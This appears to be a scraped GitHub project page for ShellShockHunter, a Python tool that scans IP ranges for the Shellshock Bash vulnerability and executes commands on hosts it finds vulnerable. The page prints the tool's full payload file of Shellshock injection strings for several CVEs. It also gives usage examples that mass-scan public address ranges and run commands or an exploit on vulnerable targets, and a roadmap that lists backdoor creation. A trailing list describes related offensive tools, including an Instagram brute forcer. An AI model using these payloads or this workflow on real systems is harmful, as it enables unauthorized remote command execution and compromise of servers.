It's a simple tool for test vulnerability shellshock

Overview

Banner ShellShockHunter v1.0

ShellShockHunter v1.0

It's a simple tool for test vulnerability shellshock

GPL License GitHub code size in bytes Python 3.8 Supported_OS Linux orange Supported OS Mac

Autor:    MrCl0wn
Blog:     http://blog.mrcl0wn.com
GitHub:   https://github.com/MrCl0wnLab
Twitter:  https://twitter.com/MrCl0wnLab
Email:    mrcl0wnlab\@\gmail.com

Shellshock (software bug)

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (MrCl0wnLab) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not MrCl0wnLab's responsibility.

Installation

Use the package manager pip

Pip

pip install shodan
pip install ipinfo

Help

python main.py --help

                        
                                          ,/
                                        ,'/
                                      ,' /
                                    ,'  /_____,
                                  .'____    ,'    
                                        /  ,'
                                      / ,'
                                      /,'
                                    /'
             ____  _     _____ _     _     ____  _      ___       _    
            / ___|| |__ |___ /| |   | |   / ___|| |__  / _ \  ___| | __
            \___ \| '_ \  |_ \| |   | |   \___ \| '_ \| | | |/ __| |/ /
             ___) | | | |___) | |___| |___ ___) | | | | |_| | (__|   < 
            |____/|_| |_|____/|_____|_____|____/|_| |_|\___/ \___|_|\_\
                     __   _   _             _              __                  
                    | _| | | | |_   _ _ __ | |_ ___ _ __  |_ |                 
                    | |  | |_| | | | | '_ \| __/ _ \ '__|  | |                 
                    | |  |  _  | |_| | | | | ||  __/ |     | |                 
                    | |  |_| |_|\__,_|_| |_|\__\___|_|     | |                 
                    |__|                                  |__| v1.0                
                      By: MrCl0wn / https://blog.mrcl0wn.com                                                                          
         
usage: tool [-h] [--file ] [--range ,] 
[--cmd-cgi ] [--exec-vuln ] [--thread <20>] 
[--check] [--ssl] [--cgi-file ] [--timeout <5>] [--all] [--debug]

optional arguments:
  -h, --help                   show this help message and exit
  --file              Input your target host lists
  --range ,  Set range IP Eg.: 192.168.15.1,192.168.15.100
  --cmd-cgi     Define shell command that will be executed in the payload
  --exec-vuln   Executing commands on vulnerable targets
  --thread <20>, -t <20>       Eg. 20
  --check                      Check for shellshock vulnerability
  --ssl                        Enable request with SSL
  --cgi-file          Defines a CGI file to be used
  --timeout <5>                Set connection timeout
  --all                        Teste all payloads
  --debug, -d                  Enable debug mode

Command e.g:

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'

python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"' --debug

Prints:

START

Logo

PROCESS

Logo

SPECIAL COMMAND ( --exec-vuln 'echo "_TARGET_"' )

Logo

COMMAND ( --debug )

Logo --debug

Source file ( Exploits )

pwd: assets/exploits.json

{
    "DEFAULT":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271": 
        "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
    "CVE-2014-6271-2":
        "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
    "CVE-2014-6271-3":
        "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
    "CVE-2014-7169":
        "() { (a)=>\\' /bin/bash -c 'echo _CHECKER_'; cat echo",
    "CVE-2014-7186":
        "/bin/bash -c 'true <",
    "CVE-2014-7187":
        "(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'",
    "CVE-2014-6278":
        "() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
    "CVE-2014-6278-2":    
        "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
    "CVE-2014-6277":
        "() { x() { _; }; x() { _; } <",
    "CVE-2014-*":
        "() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'"
}

Source file ( Config )

pwd: assets/config.json

{
    "config": {
        "threads": 20,
        "path": {
            "path_output": "output/",
            "path_wordlist": "wordlist/",
            "path_modules": "modules/",
            "path_assets": "assets/"
        },
        "files_assets":{
            "config": "assets/config.json",
            "autor": "assets/autor.json",
            "exploits": "assets/exploits.json"
        },
        "api":{
            "shodan":"",
            "ipinfo":""
        }
    }
}

Tree

├── assets
│   ├── autor.json
│   ├── config.json
│   ├── exploits.json
│   └── prints
│       ├── banner.png
│       ├── print00.png
│       ├── print01.png
│       ├── print02.png
│       └── print03.png
├── LICENSE
├── main.py
├── modules
│   ├── banner_shock.py
│   ├── color_shock.py
│   ├── debug_shock.py
│   ├── file_shock.py
│   ├── __init__.py
│   ├── request_shock.py
│   ├── shodan_shock.py
│   └── thread_shock.py
├── output
│   └── vuln.txt
├── README.md
└── wordlist
    └── cgi.txt

Ref

Roadmap

I started this project to study a little more python and interact more with APIS like shodan and ipinfo.

  • Command line structure
  • Banner
  • File management class
  • HttpRequests management class
  • Thread management class
  • Source file for exploits
  • Color in process
  • Shell Exec on vulnerable targets
  • Process debug
  • Integration with ipinfo api
  • Integration with ipinfo api
  • Integration with telegram api
  • Backdoor creation
  • Visual filter
  • Header manipulation
Issues
  • error in main.py

    error in main.py

    when i ran python main.py --help

    File "main.py", line 34 def grep_uid(_html:str): ^ SyntaxError: invalid syntax

    opened by MR-pentestGuy 2
Owner
Mr. Cl0wn - H4ck1ng C0d3r
GED (Gambiarra, Exploit and Development )
Mr. Cl0wn - H4ck1ng C0d3r
It's a simple tool for test vulnerability Apache Path Traversal

SimplesApachePathTraversal Simples Apache Path Traversal It's a simple tool for test vulnerability Apache Path Traversal https://blog.mrcl0wn.com/2021

Mr. Cl0wn - H4ck1ng C0d3r 51 Jan 6, 2022
Aiminsun 81 Jan 11, 2022
IP Denial of Service Vulnerability ")A proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability ")

CVE-2021-24086 This is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patc

Carry 1 Nov 25, 2021
Python script to tamper with pages to test for Log4J Shell vulnerability.

log4jShell Scanner This shell script scans a vulnerable web application that is using a version of apache-log4j < 2.15.0. This application is a static

GoVanguard 5 Jan 12, 2022
An auxiliary tool for iot vulnerability hunter

firmeye - IoT固件漏洞挖掘工具 firmeye 是一个 IDA 插件,基于敏感函数参数回溯来辅助漏洞挖掘。我们知道,在固件漏洞挖掘中,从敏感/危险函数出发,寻找其参数来源,是一种很有效的漏洞挖掘方法,但程序中调用敏感函数的地方非常多,人工分析耗时费力,通过该插件,可以帮助排除大部分的安全

Firmy Yang 84 Dec 24, 2021
Use FOFA automatic vulnerability scanning tool

AutoSRC Use FOFA automatic vulnerability scanning tool Usage python3 autosrc.py -e <FOFA EMAIL> -k <TOKEN> Screenshots License MIT Dev 6613GitHub6613

PwnWiki 45 Dec 30, 2021
A fast tool to scan prototype pollution vulnerability

proto A fast tool to scan prototype pollution vulnerability Syntax python3 proto.py -l alive.txt Requirements Selenium Google Chrome Webdriver Note :

Muhammed Mahdi 4 Aug 31, 2021
WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities

WebScan is a web vulnerability Scanning tool, which scans sites for SQL injection and XSS vulnerabilities Which is a great tool for web pentesters. Coded in python3, CLI. WebScan is capable of scanning and detecting sql injection vulnerabilities across HTTP and HTTP sites.

AnonyminHack5 14 Sep 18, 2021
Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability

AdminerRead Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability Installation git clone https://github.com/p0dalirius/AdminerRea

Podalirius 10 Dec 23, 2021
Multi-Process Vulnerability Tool

Multi-Process Vulnerability Tool

Baris Dincer 1 Dec 22, 2021
open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability

CVE-2021-44228-log4jVulnScanner-metasploit open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability pre

Taroballz 4 Dec 31, 2021
Raphael is a vulnerability scanning tool based on Python3.

Raphael Raphael是一款基于Python3开发的插件式漏洞扫描工具。 Raphael is a vulnerability scanning too

b4zinga 4 Jan 6, 2022
Click-Jack - Automatic tool to find Clickjacking Vulnerability in various Web applications

CLICK-Jack It is a automatic tool to find Clickjacking Vulnerability in various

Prince Prafull 4 Jan 10, 2022
Automated tool to find & created Exploit Poc for Clickjacking Vulnerability

ClickJackPoc This tool will help you automate finding Clickjacking Vulnerability by just passing a file containing list of Targets . Once the Target i

Chirag Agrawal 5 Jan 12, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Víctor García 137 Jan 10, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Wade 1 Dec 15, 2021
DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

vijay sahu 9 Sep 28, 2021
Instagram brute force tool that uses tor as its proxy connections

Insta-crack This is a instagram brute force tool that uses tor as its proxy connections, keep in mind that you should not do anything illegal with thi

Liam 2 Dec 1, 2021
Open source vulnerability DB and triage service.

OSV - Open Source Vulnerabilities OSV is a vulnerability database and triage infrastructure for open source projects aimed at helping both open source

Google 450 Jan 12, 2022